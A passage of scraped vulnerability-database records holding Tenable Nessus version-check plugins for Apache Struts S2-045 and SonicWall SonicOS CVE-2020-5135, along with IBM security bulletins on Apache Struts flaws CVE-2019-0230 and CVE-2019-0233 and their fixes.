value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web application that uses a Java framework\nthat is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.3.5\nthrough 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore,\naffected by a remote code execution vulnerability in the Jakarta\nMultipart parser due to improper handling of the Content-Type,\nContent-Disposition, and Content-Length headers. An unauthenticated,\nremote attacker can exploit this, via a specially crafted header value\nin the HTTP request, to potentially execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-046\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 
2.3.32 / 2.5.10.1 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"min_version\" : \"2.3.5\", \"max_version\" : \"2.3.31\", \"fixed_version\" : \"2.3.32\" },\n { \"min_version\" : \"2.5\", \"max_version\" : \"2.5.10\", \"fixed_version\" : \"2.5.10.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-18T15:01:31", "description": "The instance of Selligent Message Studio running on the remote host is affected by CVE-2017-5638, a code execution vulnerability in Apache Struts (S2-045). A remote, unauthenticated attacker can exploit this issue, via a specially crafted HTTP request, to execute code on the remote host.", "cvss3": {}, "published": "2020-10-20T00:00:00", "type": "nessus", "title": "Selligent Message Studio Struts Code Execution (CVE-2017-5638)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2023-10-16T00:00:00", "cpe": ["x-cpe:/a:selligent:selligent_message_studio"], "id": "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "href": "https://www.tenable.com/plugins/nessus/141576", "sourceData": "Binary data selligent_message_studio_rce.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:23:09", "description": "According to its self-reported version, the remote SonicWall firewall is running a version of SonicOS that is affected by a buffer overflow vulnerability, allowing a remote attacker to cause Denial of Service (DoS), and potentially execute arbitrary code by sending a malicious request to the firewall. 
This vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-10-16T00:00:00", "type": "nessus", "title": "SonicWall SonicOS Buffer Overflow Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:sonicwall:sonicos"], "id": "SONICWALL_SNWLID-2020-0010.NASL", "href": "https://www.tenable.com/plugins/nessus/141474", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141474);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2020-5135\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0127\");\n\n script_name(english:\"SonicWall SonicOS Buffer Overflow Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a Buffer Overflow vulnerability, leading to Denial of Service, \nand potentially to Arbitrary Code Execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the remote SonicWall firewall is running a version of SonicOS that is affected\nby a buffer overflow vulnerability, allowing a remote attacker to cause Denial of Service (DoS), \nand potentially execute arbitrary code by sending a malicious request to the firewall. 
\nThis vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v \nand Gen 7 version 7.0.0.0.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c667b9f5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in the vendor security advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-5135\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sonicwall:sonicos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\");\n script_require_keys(\"Host/OS\");\n\n exit(0);\n}\n\nos = get_kb_item_or_exit(\"Host/OS\");\nif (os !~ \"^SonicOS\" ) audit(AUDIT_OS_NOT, \"SonicWall SonicOS\");\n\n# SonicOS Enhanced 6.0.5.3-94o on a SonicWALL NSA 220\nmatch = pregmatch(pattern:\"^SonicOS(?: Enhanced)? (([0-9.]+)(-[^ ]*)?) on a SonicWALL\", string:os);\nif (isnull(match)) exit(1, \"Failed to identify the version of SonicOS.\");\nversion = match[1];\n\nfix = NULL;\n\n\nif (version =~ \"^6\\.\")\n{\n # SonicOS 6.0.5.3-93o and earlier\n # fixex in SonicOS 6.0.5.3-94o\n if (version =~ \"^6\\.0\\.5\\.3-([0-8]?[0-9]|9[0-3])o\")\n fix = \"6.0.5.3-94o\"; \n # SonicOS 6.5.1.11-4n and earlier\n # fixed in SonicOS 6.5.1.12-1n\n else if (version =~ \"^6\\.5\\.1\\.11-\\d+n\")\n fix = \"SonicOS 6.5.1.12-1n\";\n # SonicOS 6.5.4.7-79n and earlier\n # fixed in SonicOS 6.5.4.7-83n\n else if (version =~ \"^6\\.5\\.4\\.7-[0-7]?[0-9]n\")\n fix = \"6.5.4.7-83n\";\n # SonicOSv 6.5.4.4-44v-21-794 and earlier\n # fixed in SonicOS 6.5.4.v-21s-987\n # XXX not sure how I can check for this version,\n # as version and fix formats look different\n #else if (version =~ \"^6\\.5\\.4\\.4\")\n # fix = \"6.5.4.v-21s-987\";\n}\n# SonicOS 7.0.0.0-1\n# fixed in 7.0.0.0-2\nelse if (version =~ \"^7\\.0\\.0\\.0-[01]$\")\n{\n fix = \"7.0.0.0-2\";\n}\n\nif (isnull(fix))\n audit(AUDIT_DEVICE_NOT_VULN, \"SonicWALL \", \"SonicOS \" + version);\n#if (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\nelse\n{\n port = 0;\n report =\n '\\n Installed SonicOS version : ' + version +\n '\\n Fixed SonicOS version : ' + fix +\n '\\n';\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "ibm": [{"lastseen": "2023-02-27T21:44:04", "description": "## Summary\n\nVulnerabilities in Apache Struts affect IBM Tivoli Application Dependency Discovery Manager (CVE-2019-0233, CVE-2019-0230)\n\n## 
Vulnerability Details\n\n**CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n**DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n**DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Tivoli Application Dependency Discovery Manager | 7.3.0.7 \n \n## Remediation/Fixes\n\n**Fix** | **VRMF** | **APAR** | **How to acquire fix** \n---|---|---|--- \nefix_struts2.5.22_FP7200218.zip | 7.3.0.7 | None | [Download eFix](<https://www.secure.ecurep.ibm.com/download/?id=UpR3LS6M2oBcbLFNfcXFzqCsw2d008xhOwZDwfQ15h0> \"Download eFix\" ) \n \nPlease get familiar with eFix readme in etc/<efix_name>_readme.txt\n\n## Workarounds and Mitigations\n\nThe above eFix is applicable can be downloaded and applied directly.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T13:33:14", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Struts affect IBM Tivoli Application Dependency Discovery Manager.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2021-04-13T13:33:14", "id": "35DB525D4E07A09A6F2976ED4B93F380507E2F51F096B5749BE6E096C57DD8BD", "href": 
"https://www.ibm.com/support/pages/node/6347964", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:13", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 
"version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T09:04:41", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-11-04T09:04:41", "id": "3477DD0939B4B8CC59240F8DCC09305A2F7C13CA45285602F1755CDF6F593B52", "href": "https://www.ibm.com/support/pages/node/6359443", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:50:43", "description": "## Summary\n\nFix is available for vulnerabilities in Apache Struts affecting Tivoli Netcool/OMNIbus WebGUI (CVE-2019-0233, CVE-2019-0230).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Netcool/OMNIbus_GUI| 8.1.x \n \n\n\n## Remediation/Fixes\n\nProduct| VRMF| APAR | Remediation/First Fix \n---|---|---|--- \nTivoli Netcool/OMNIbus WebGUI| 8.1.0| IJ27034| Apply Fix Pack 20 \n([Fix Pack for WebGUI 8.1.0 Fix Pack 20](<https://www.ibm.com/support/pages/node/6236916> \"Fix Pack for WebGUI 8.1.0 Fix Pack 20\" )) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-23T04:29:58", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Struts affect Tivoli Netcool/OMNIbus WebGUI (CVE-2019-0233, CVE-2019-0230)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-09-23T04:29:58", "id": "9235ED396A90BB944C2B22072DE6B91B22155C3982DDD732067344CA700C0ADE", "href": "https://www.ibm.com/support/pages/node/6336355", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:24", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. 
\nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 
"UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T19:08:30", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-10-28T19:08:30", "id": "461BBFF276D2BD07EE935B18691B56E01933360B1B42DAE8AAFFC1167BCA5486", "href": "https://www.ibm.com/support/pages/node/6356619", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:24", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. 
By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft 
